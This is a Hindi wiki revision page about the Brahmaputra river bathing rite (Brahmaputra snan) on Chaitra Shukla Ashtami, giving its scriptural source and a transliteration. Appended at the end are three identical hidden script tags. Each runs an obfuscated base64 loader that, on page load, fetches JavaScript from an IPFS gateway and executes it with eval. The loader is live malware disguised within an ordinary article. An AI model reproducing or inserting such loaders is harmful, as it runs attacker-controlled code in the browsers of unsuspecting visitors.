Difference between revisions of "ब्रह्मपुत्र स्नान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[अष्टमी]] को [[ब्रह्मपुत्र नदी|ब्रह्मपुत्र]] (इसे लोहित्य भी कहा जाता है) नदी में स्नान करना चाहिए।  
+
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[अष्टमी]] को [[ब्रह्मपुत्र नदी|ब्रह्मपुत्र]] (इसे लोहित्य भी कहा जाता है) नदी में [[स्नान]] करना चाहिए।  
 
*इस व्रत को करने से सभी पाप कट जाते हैं, क्योंकि उस दिन उस नदी में सभी पवित्र नदियाँ एवं समुद्र उपस्थित माने जाते हैं <ref>वर्षक्रियाकौमुदी (522, कालिकापुराण एवं भविष्योत्तपुराण 77|85-59 से उद्धरण)</ref>।  
 
*इस व्रत को करने से सभी पाप कट जाते हैं, क्योंकि उस दिन उस नदी में सभी पवित्र नदियाँ एवं समुद्र उपस्थित माने जाते हैं <ref>वर्षक्रियाकौमुदी (522, कालिकापुराण एवं भविष्योत्तपुराण 77|85-59 से उद्धरण)</ref>।  
  

Revision as of 14:43, 25 January 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl ashtami ko brahmaputr (ise lohity bhi kaha jata hai) nadi mean snan karana chahie.
  • is vrat ko karane se sabhi pap kat jate haian, kyoanki us din us nadi mean sabhi pavitr nadiyaan evan samudr upasthit mane jate haian [1].


tika tippani aur sandarbh

  1. varshakriyakaumudi (522, kalikapuran evan bhavishyottapuran 77|85-59 se uddharan)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>